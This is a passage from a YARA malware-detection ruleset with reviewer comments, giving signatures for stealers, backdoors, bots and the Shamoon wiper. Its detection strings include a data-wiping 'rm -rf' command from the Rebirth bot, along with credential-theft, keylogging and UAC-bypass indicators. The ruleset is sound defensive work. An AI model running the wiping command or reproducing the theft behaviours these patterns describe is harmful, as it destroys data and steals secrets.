    //$useragent1 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
    //$useragent2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
  condition:
    $s1 and $s2 and $s3 and $s4
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Predator The Thief >= 2.3.5. $hex2..$hex5 appear to be single-byte stores of the form
// "mov byte ptr [ecx+esi], imm8" writing the characters 'k','c','u','f'; they are only 4
// bytes each, so "all of ($hex*)" together with the MZ check carries the specificity.
rule Predator_The_Thief : Predator_The_Thief
{
  meta:
    description = "Yara rule for Predator The Thief v2.3.5 & +"
    author = "Fumik0_"
    date = "2018/10/12"
    source = "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/"
  strings:
    $mz = { 4D 5A }
    $hex1 = { BF 00 00 40 06 }
    $hex2 = { C6 04 31 6B }
    $hex3 = { C6 04 31 63 }
    $hex4 = { C6 04 31 75 }
    $hex5 = { C6 04 31 66 }
    $s1 = "sqlite_" ascii wide
  condition:
    $mz at 0 and all of ($hex*) and all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// PubSab (OS X backdoor), code-level indicator: one decryption sequence.
rule PubSabCode : PubSab Family
{
  meta:
    description = "PubSab code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
  condition:
    any of them
}

// PubSab, string-level indicator: launch-agent label, misspelled init symbol, screenshot path.
// "any of them" means a single hit suffices; "/tmp/screen.jpeg" on its own is the weakest.
rule PubSabStrings : PubSab Family
{
  meta:
    description = "PubSab Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $ = "_deamon_init"
    $ = "com.apple.PubSabAgent"
    $ = "/tmp/screen.jpeg"
  condition:
    any of them
}

// Family wrapper: either of the two PubSab rules above.
rule PubSab : Family
{
  meta:
    description = "PubSab"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  condition:
    PubSabCode or PubSabStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// PurpleWave v1.0 stealer: the string-decoding routine plus the "][field]" log separators and
// both alphabets (base64 and base36) used by the sample.
rule MALW_PurpleWave_v1
{
  meta:
    Description = "Generic rule to identify PurpleWave v1.0"
    Author = "Xylitol <xylitol@temari.fr>"
    date = "2020-08-01"
    reference = "https://twitter.com/3xp0rtblog/status/1289125217751781376"
    hash1 = "7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df"
    hash2 = "76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304"
    hash3 = "832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd"
    hash4 = "917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9"
    hash5 = "a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16"
    hash6 = "d5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161"
    hash7 = "d820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9"
    hash8 = "d4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554"
    hash9 = "4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d"
  strings:
    $MZ = {4D 5A}
    $decoderoutine = { 8B 45 E8 33 C9 8A 04 07 28 04 1A 42 83 FF 07 8D 47 01 0F 45 C8 8B F9 3B D6 7C E5 }
    /* generic routine used to decode strings (bot name, bot version, mutex, c2 url, etc..)
       /8B45 E8   /MOV EAX,[LOCAL.6]
       |33C9      |XOR ECX,ECX
       |8A0407    |MOV AL,BYTE PTR DS:[EDI+EAX]
       |28041A    |SUB BYTE PTR DS:[EDX+EBX],AL
       |42        |INC EDX
       |83FF 07   |CMP EDI,7
       |8D47 01   |LEA EAX,DWORD PTR DS:[EDI+1]
       |0F45C8    |CMOVNE ECX,EAX
       |8BF9      |MOV EDI,ECX
       |3BD6      |CMP EDX,ESI
       \7C E5     \JL SHORT 76bffcf0.0135B57F */
    // Regular strings that can be found into purplewave 1.0 samples
    $string1 = " at t.me/LuckyStoreSupport |" fullword wide
    $string2 = "][aes_key]" wide ascii
    $string3 = "][passwords][" wide ascii
    $string4 = "][is_encrypted]" wide ascii
    $string5 = "][cards][" wide ascii
    $string6 = "][number]" wide ascii
    $string7 = "][domain]" wide ascii
    $string8 = "][cookies][" wide ascii
    $string9 = "][flag]" wide ascii
    $string10 = "][histories][" wide ascii
    $string11 = "D877F783D5D3EF8C" wide ascii
    $alphabet1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    $alphabet2 = "0123456789abcdefghijklmnopqrstuvwxyz"
  condition:
    ($MZ at 0 and $decoderoutine)
    and ( (5 of ($string*) and all of ($alphabet*)) )
    and filesize < 700KB // Standard size when not packed should be arround ~598/600kb
}

// Fake PyPI packages (SK-CERT advisory): the three marker strings from the typosquatted code.
rule MALW_FakePyPI
{
  meta:
    description = "Identifies fake PyPI Packages."
    author = "@bartblaze"
    reference = "http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/"
    date = "2017-09"
    tlp = "white"
  strings:
    $ = "# Welcome Here! :)"
    $ = "# just toy, no harm :)"
    $ = "[0x76,0x21,0xfe,0xcc,0xee]"
  condition:
    all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// PyInstaller-built PE: not malicious by itself, this is a packaging indicator. The pe module
// check restricts hits to parseable PE files that carry at least one resource.
rule PE_File_pyinstaller
{
  meta:
    author = "Didier Stevens (https://DidierStevens.com)"
    description = "Detect PE file produced by pyinstaller"
    reference = "https://isc.sans.edu/diary/21057"
  strings:
    $a = "pyi-windows-manifest-filename"
  condition:
    pe.number_of_resources > 0 and $a
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// PyInstaller bootloader strings. NOTE(review): despite the name there is no Mach-O magic
// check, so any file or memory region containing these option names matches (including
// PE builds and the bootloader sources); treat as a packaging hint, not a verdict.
rule MachO_File_pyinstaller
{
  meta:
    author = "KatsuragiCSL (https://katsuragicsl.github.io)"
    description = "Detect Mach-O file produced by pyinstaller"
  strings:
    $a = "pyi-runtime-tmpdir"
    $b = "pyi-bootloader-ignore-signals"
  condition:
    any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Quarian, string-level indicator. "any of them" fires on a single string; most are
// distinctive (PDB paths, device names, misspelled folder names) but "ok1-1" is a 5-byte
// token that can occur by chance, so corroborate a hit that rests on it alone.
rule QuarianStrings : Quarian Family
{
  meta:
    description = "Quarian Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    $ = "s061779s061750"
    $ = "[OnUpLoadFile]"
    $ = "[OnDownLoadFile]"
    $ = "[FileTransfer]"
    $ = "---- Not connect the Manager, so start UnInstall ----"
    $ = "------- Enter CompressDownLoadDir ---------"
    $ = "------- Enter DownLoadDirectory ---------"
    $ = "[HandleAdditionalData]"
    $ = "[mswsocket.dll]"
    $ = "msupdate.dll........Enter ThreadCmd!"
    $ = "ok1-1"
    $ = "msupdate_tmp.dll"
    $ = "replace Rpcss.dll successfully!"
    $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
    $ = "\\drivercashe\\" wide ascii
    $ = "\\microsoft\\windwos\\" wide ascii
    $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
    $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
    $ = "Global\\state_maping" wide ascii
    $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
    $ = "Global\\unInstall_event_1554_Ower" wide ascii
  condition:
    any of them
}

// Quarian, code-level indicator: decryption/loop fragments from its three components.
rule QuarianCode : Quarian Family
{
  meta:
    description = "Quarian code features"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  strings:
    // decrypt in intelnat.sys
    $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
    // decrypt in mswsocket.dll
    $ = { C1 EF 05 C1 E3 04 33 FB }
    $ = { 33 D8 81 EE 47 86 C8 61 }
    // loop in msupdate.dll
    $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
  condition:
    any of them
}

// Family wrapper: either Quarian rule above.
rule Quarian : Family
{
  meta:
    description = "Quarian"
    author = "Seth Hardy"
    last_modified = "2014-07-09"
  condition:
    QuarianCode or QuarianStrings
}

/* Yara rule to detect ELF Linux malware Rebirth Vulcan (Torlus next-gen) generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Rebirth/Vulcan (Torlus next-gen) building blocks. The three private rules below are only
// meaningful in combination; MALW_Rebirth_Vulcan_ELF is the rule that ties them to an ELF
// header (is__elf, defined at the top of this file) and a size bound.
private rule is__str_Rebirth_gen3
{
  meta:
    description = "Generic detection for Vulcan branch Rebirth or Katrina from Torlus nextgen"
    reference = "https://imgur.com/a/SSKmu"
    reference = "https://www.reddit.com/r/LinuxMalware/comments/7rprnx/vulcan_aka_linuxrebirth_or_katrina_variant_of/"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-01-21"
  strings:
    $str01 = "/usr/bin/python" fullword nocase wide ascii
    $str02 = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" fullword nocase wide ascii
    $str03 = "Telnet Range %d->%d" fullword nocase wide ascii
    $str04 = "Mirai Range %d->%d" fullword nocase wide ascii
    $str05 = "[Updating] [%s:%s]" fullword nocase wide ascii
    $str06 = "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" fullword nocase wide ascii
    $str07 = "\x1B[96m[DEVICE] \x1B[97mConnected" fullword nocase wide ascii
  condition:
    4 of them
}

// Architecture-specific prologue/constant fragments. $hex06/$hex07 are ordinary x86/x64
// function prologues and $hex08 is just "ogin\0", so this rule is weak on its own — which is
// why it is private and only used together with the string rules.
private rule is__hex_Rebirth_gen3
{
  meta:
    author = "unixfreaxjp"
    date = "2018-01-21"
  strings:
    $hex01 = { 0D C0 A0 E1 00 D8 2D E9 }
    $hex02 = { 3C 1C 00 06 27 9C 97 98 }
    $hex03 = { 94 21 EF 80 7C 08 02 A6 }
    $hex04 = { E6 2F 22 4F 76 91 18 3F }
    $hex05 = { 06 00 1C 3C 20 98 9C 27 }
    $hex06 = { 55 89 E5 81 EC ?? 10 00 }
    $hex07 = { 55 48 89 E5 48 81 EC 90 }
    $hex08 = { 6F 67 69 6E 00 }
  condition:
    2 of them
}

// Bot command keywords. Several are very short ("STD", "BCM", "RANGE"), hence the
// requirement for six of them and the private scope.
private rule is__bot_Rebirth_gen3
{
  meta:
    author = "unixfreaxjp"
    date = "2018-01-21"
  strings:
    $bot01 = "MIRAITEST" fullword nocase wide ascii
    $bot02 = "TELNETTEST" fullword nocase wide ascii
    $bot03 = "UPDATE" fullword nocase wide ascii
    $bot04 = "PHONE" fullword nocase wide ascii
    $bot05 = "RANGE" fullword nocase wide ascii
    $bot06 = "KILLATTK" fullword nocase wide ascii
    $bot07 = "STD" fullword nocase wide ascii
    $bot08 = "BCM" fullword nocase wide ascii
    $bot09 = "NETIS" fullword nocase wide ascii
    $bot10 = "FASTLOAD" fullword nocase wide ascii
  condition:
    6 of them
}

// Public Rebirth/Vulcan rule: variant-specific names plus all three generic building blocks.
rule MALW_Rebirth_Vulcan_ELF
{
  meta:
    description = "Detects Rebirth Vulcan variant a torlus NextGen MALW"
    description = "Just adjust or omit below two strings for next version they code :) @unixfreaxjp"
    date = "2018-01-21"
  strings:
    $spec01 = "vulcan.sh" fullword nocase wide ascii
    $spec02 = "Vulcan" fullword nocase wide ascii
  condition:
    all of them
    and is__elf
    and is__str_Rebirth_gen3
    and is__hex_Rebirth_gen3
    and is__bot_Rebirth_gen3
    and filesize < 300KB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// RegSubDat, code-level indicator: decryption loop and two push/pop constant idioms.
// "all of them" — every fragment is required.
rule RegSubDatCode : RegSubDat Family
{
  meta:
    description = "RegSubDat code features"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    // decryption loop
    $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
    // push then pop values
    $ = { 68 FF FF 7F 00 5? }
    $ = { 68 FF 7F 00 00 5? }
  condition:
    all of them
}

// RegSubDat, string-level indicator: the AVG-firewall dialog strings it clicks through
// (all five required, since "Button"/"Allow" alone are generic) or the mutex literal.
rule RegSubDatStrings : RegSubDat Family
{
  meta:
    description = "RegSubDat Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  strings:
    $avg1 = "Button"
    $avg2 = "Allow"
    $avg3 = "Identity Protection"
    $avg4 = "Allow for all"
    $avg5 = "AVG Firewall Asks For Confirmation"
    $mutex = "0x1A7B4C9F"
  condition:
    all of ($avg*) or $mutex
}

// Family wrapper: either RegSubDat rule above.
rule RegSubDat : Family
{
  meta:
    description = "RegSubDat"
    author = "Seth Hardy"
    last_modified = "2014-07-14"
  condition:
    RegSubDatCode or RegSubDatStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
  Description: Rar file with a .js inside
  Author: iHeartMalware
  Priority: 5
  Scope: Against Attachment
  Tags: http://phishme.com/rockloader-new-upatre-like-downloader-pushed-dridex-downloads-malwares/
  Created in PhishMe Triage on April 7, 2016 3:41 PM
*/

// Triage heuristic, not a malware signature: a RAR archive whose bytes contain ".js".
// NOTE(review): ".js" nocase also matches ".json", ".jsp", ".jsx" and random bytes inside
// compressed data, so expect noise on larger archives.
rule rar_with_js
{
  strings:
    $h1 = "Rar!"
    $s1 = ".js" nocase
  condition:
    $h1 at 0 and $s1
}

// RockLoader downloader: MZ header, two opcode fragments, size bound.
rule RockLoader
{
  meta:
    name = "RockLoader"
    description = "RockLoader Malware"
    author = "@seanmw"
  strings:
    $hdr = {4d 5a 90 00}
    $op1 = {39 45 f0 0f 8e b0 00 00 00}
    $op2 = {32 03 77 73 70 72 69 6e 74 66 41 00 ce 02 53 65}
  condition:
    $hdr at 0 and all of ($op*) and filesize < 500KB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Rooter, code-level indicator: the xor-0x30 decryption loop.
rule RooterCode : Rooter Family
{
  meta:
    description = "Rooter code features"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
    // xor 0x30 decryption
    $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }
  condition:
    any of them
}

// Rooter, string-level indicator: NUL-terminated command words; three of five required
// because each is only 5-6 bytes.
rule RooterStrings : Rooter Family
{
  meta:
    description = "Rooter Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
    $group1 = "seed\x00"
    $group2 = "prot\x00"
    $group3 = "ownin\x00"
    $group4 = "feed0\x00"
    $group5 = "nown\x00"
  condition:
    3 of ($group*)
}

// Family wrapper: either Rooter rule above.
rule Rooter : Family
{
  meta:
    description = "Rooter"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  condition:
    RooterCode or RooterStrings
}

// Rookie, string-level indicator: its distinctive User-Agent token.
rule RookieStrings : Rookie Family
{
  meta:
    description = "Rookie Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "RookIE/1.0"
  condition:
    any of them
}

// Rookie, code-level indicator: byte-by-byte construction of registry value names
// (stack-string style, one "C6 ?? ?? ?? <char>" store per character) plus an xor loop.
rule RookieCode : Rookie Family
{
  meta:
    description = "Rookie code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    // hidden AutoConfigURL
    $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }
    // hidden ProxyEnable
    $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }
    // xor on rand value?
    $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }
  condition:
    any of them
}

// Family wrapper: either Rookie rule above.
rule Rookie : Family
{
  meta:
    description = "Rookie"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    RookieCode or RookieStrings
}

// Rovnix downloader: the word list it uses to recognise sinkhole/research domains in
// responses, plus the bootkit DLL name. All fourteen words are required, which is what
// keeps common tokens like "block" and "anti" from firing alone.
rule rovnix_downloader : downloader
{
  meta:
    author = "Intel Security"
    description = "Rovnix downloader with sinkhole checks"
    reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
  strings:
    $sink1 = "control"
    $sink2 = "sink"
    $sink3 = "hole"
    $sink4 = "dynadot"
    $sink5 = "block"
    $sink6 = "malw"
    $sink7 = "anti"
    $sink8 = "googl"
    $sink9 = "hack"
    $sink10 = "trojan"
    $sink11 = "abuse"
    $sink12 = "virus"
    $sink13 = "black"
    $sink14 = "spam"
    $boot = "BOOTKIT_DLL.dll"
    $mz = { 4D 5A }
  condition:
    $mz in (0..2) and all of ($sink*) and $boot
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// SafeNet, code-level indicator.
rule SafeNetCode : SafeNet Family
{
  meta:
    description = "SafeNet code features"
    author = "Seth Hardy"
    last_modified = "2014-07-16"
  strings:
    // add edi, 14h; cmp edi, 40D0F8h  (immediate bytes F8 D0 40 00, little-endian)
    $ = { 83 C7 14 81 FF F8 D0 40 00 }
  condition:
    any of them
}

// SafeNet, string-level indicator. Single-hit rule: the 64-char key and the "/safe/record.php"
// path are specific; "Ext.org" and "_Rm.bat" are short enough to collide, so corroborate.
rule SafeNetStrings : SafeNet Family
{
  meta:
    description = "Strings used by SafeNet"
    author = "Seth Hardy"
    last_modified = "2014-07-16"
  strings:
    $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
    $ = "/safe/record.php"
    $ = "_Rm.bat" wide ascii
    $ = "try\x0d\x0a\x09\x09\x09\x09 del %s" wide ascii
    $ = "Ext.org" wide ascii
  condition:
    any of them
}

// Family wrapper: either SafeNet rule above.
rule SafeNet : Family
{
  meta:
    description = "SafeNet family"
  condition:
    SafeNetCode or SafeNetStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Sakurel: this is an event-log rule, not a binary signature — it expects Security log
// text (provider name, event id 4688 process creation) naming both the sysprep.exe launch
// used for the UAC bypass and the dropped MediaCenter.exe in %TEMP%.
// NOTE(review): $type/$type1 and $eventid/$eventid1 are identical literals; under
// "all of them" the duplicates add nothing but are kept as the author wrote them.
rule Sakurel_backdoor
{
  meta:
    maltype = "Sakurel backdoor"
    ref = "https://github.com/reed1713"
    reference = "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Sakurel.A#tab=2"
    description = "malware creates a process in the temp directory and performs the sysprep UAC bypass method."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "Windows\\System32\\sysprep\\sysprep.exe" nocase
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" nocase
  condition:
    all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Sayad infostealer, binder component: PDB path plus the bundled helper DLL names.
rule Vinsula_Sayad_Binder : infostealer binder
{
  meta:
    Author = "Vinsula, Inc"
    Date = "2014/06/20"
    Description = "Sayad Infostealer Binder"
    Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
  strings:
    $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdb"
    $delphinativestr = "DelphiNative.dll" nocase
    $sqlite3str = "sqlite3.dll" nocase
    $winexecstr = "WinExec"
    $sayadconfig = "base.dll" wide
  condition:
    all of them
}

// Sayad infostealer, client component: PDB path and the full set of UTF-16 debug messages
// it logs while collecting credentials. Every string is required.
rule Vinsula_Sayad_Client : infostealer
{
  meta:
    Author = "Vinsula, Inc"
    Date = "2014/06/20"
    Description = "Sayad Infostealer Client"
    Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
  strings:
    $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb"
    $sayadconfig = "base.dll" wide
    $sqlite3str = "sqlite3.dll" nocase
    $debugstr01 = "Config loaded" wide
    $debugstr02 = "Config parsed" wide
    $debugstr03 = "storage uploader" wide
    $debugstr04 = "updater" wide
    $debugstr05 = "keylogger" wide
    $debugstr06 = "Screenshot" wide
    $debugstr07 = "sqlite found & start collectiong data" wide
    $debugstr08 = "Machine info collected" wide
    $debugstr09 = "browser ok" wide
    $debugstr10 = "messenger ok" wide
    $debugstr11 = "vpn ok" wide
    $debugstr12 = "ftp client ok" wide
    $debugstr13 = "ftp server ok" wide
    $debugstr14 = "rdp ok" wide
    $debugstr15 = "kerio ok" wide
    $debugstr16 = "skype ok" wide
    $debugstr17 = "serialize data ok" wide
    $debugstr18 = "Keylogged" wide
  condition:
    all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Scarhikn, string-level indicator. Single-hit rule; "haha123" is a plausible password
// literal in unrelated software, so a hit on it alone deserves a second look.
rule ScarhiknStrings : Scarhikn Family
{
  meta:
    description = "Scarhikn Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    $ = "9887___skej3sd"
    $ = "haha123"
  condition:
    any of them
}

// Scarhikn, code-level indicator: two variants of its xor decryption loop.
rule ScarhiknCode : Scarhikn Family
{
  meta:
    description = "Scarhikn code features"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  strings:
    // decryption
    $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
    $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
  condition:
    any of them
}

// Family wrapper: either Scarhikn rule above.
rule Scarhikn : Family
{
  meta:
    description = "Scarhikn"
    author = "Seth Hardy"
    last_modified = "2014-06-25"
  condition:
    ScarhiknCode or ScarhiknStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// SendSafe spam engine, intended for memory scans (filetype = "memory"): 26 log/format
// strings from its mailing and MX-resolution code paths; half of them must be present.
rule sendsafe
{
  meta:
    author = " J from THL <j@techhelplist.com>"
    date = "2016/09"
    reference = "http://pastebin.com/WPWWs406"
    version = 2
    maltype = "Spammer"
    filetype = "memory"
  strings:
    $a = "Enterprise Mailing Service"
    $b = "Blacklisted by rule: %s:%s"
    $c = "/SuccessMails?CampaignNum=%ld"
    $d = "/TimedOutMails?CampaignNum=%ld"
    $e = "/InvalidMails?CampaignNum=%ld"
    $f = "Failed to download maillist, retrying"
    $g = "No maillist loaded"
    $h = "Successfully sent using SMTP account %s (%d of %ld messages to %s)"
    $i = "Successfully sent %d of %ld messages to %s"
    $j = "Sending to %s in the same connection"
    $k = "New connection required, will send to %s"
    $l = "Mail transaction for %s is over."
    $m = "Domain %s is bad (found in cache)"
    $n = "Domain %s found in cache"
    $o = "Domain %s isn't found in cache, resolving it"
    $p = "All tries to resolve %s failed."
    $q = "Failed to receive response for %s from DNS server"
    $r = "Got DNS server response: domain %s is bad"
    $s = "Got error %d in response for %s from DNS server"
    $t = "MX's IP for domain %s found in cache:"
    $u = "Timeout waiting for domain %s to be resolved"
    $v = "No valid MXes for domain %s. Marking it as bad"
    $w = "Resolving MX %s using existing connection to DNS server"
    $x = "All tries to resolve MX for %s are failed"
    $y = "Resolving MX %s using DNS server"
    $z = "Failed to receive response for MX %s from DNS server"
  condition:
    13 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Shamoon (2012) dropped component: test-string artefacts left in the binary plus the
// sleep-by-ping command; "testdomain.com" is mandatory, the rest is either/or.
rule CrowdStrike_Shamoon_DroppedFile
{
  meta:
    description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
    reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
  strings:
    $testn123 = "test123" wide
    $testn456 = "test456" wide
    $testn789 = "test789" wide
    $testdomain = "testdomain.com" wide
    $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
  condition:
    (any of ($testn*) or $pingcmd) and $testdomain
}

// Shamoon 2.0 wiper. Two hits suffice for a small PE on disk; three hits are accepted
// without the header/size gate so that memory or carved regions can match too.
rule Shamoon2_Wiper
{
  meta:
    description = "Detects Shamoon 2.0 Wiper Component"
    author = "Florian Roth"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
    hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
  strings:
    $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
    $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
    $s1 = "UFWYNYNTS" fullword wide
    $s2 = "\\\\?\\ElRawDisk" fullword wide
  condition:
    ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}

// Shamoon 2.0 communication component: either both format strings or all three opcode
// fragments, inside a small PE.
rule Shamoon2_ComComp
{
  meta:
    description = "Detects Shamoon 2.0 Communication Components"
    author = "Florian Roth (with Binar.ly)"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
  strings:
    $s1 = "mkdir %s%s > nul 2>&1" fullword ascii
    $s2 = "p[%s%s%d.%s" fullword ascii
    $op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
    $op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
    $op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
  condition:
    uint16(0) == 0x5a4d and filesize < 500KB and ( all of ($s*) or all of ($op*) )
}

// EldoS RawDisk driver. This is a legitimately signed commercial driver that Shamoon 2.0
// abused for raw disk writes; the lower score reflects that a hit is context (a raw-disk
// driver being present), not a malware verdict on its own.
rule EldoS_RawDisk
{
  meta:
    description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
    author = "Florian Roth (with Binar.ly)"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 50
    hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
    hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
  strings:
    $s1 = "g\\system32\\" fullword wide
    $s2 = "ztvttw" fullword wide
    $s3 = "lwizvm" fullword ascii
    $s4 = "FEJIKC" fullword ascii
    $s5 = "INZQND" fullword ascii
    $s6 = "IUTLOM" fullword wide
    $s7 = "DKFKCK" fullword ascii
    $op1 = { 94 35 77 73 03 40 eb e9 }
    $op2 = { 80 7c 41 01 00 74 0a 3d }
    $op3 = { 74 0a 3d 00 94 35 77 }
  condition:
    ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )
}

// Shamoon 2.0 Disttrack dropper: one of the two embedded resource/GUID markers plus one
// ElRawDisk artefact, in a PE under 90 KB.
rule Shamoon_Disttrack_Dropper
{
  meta:
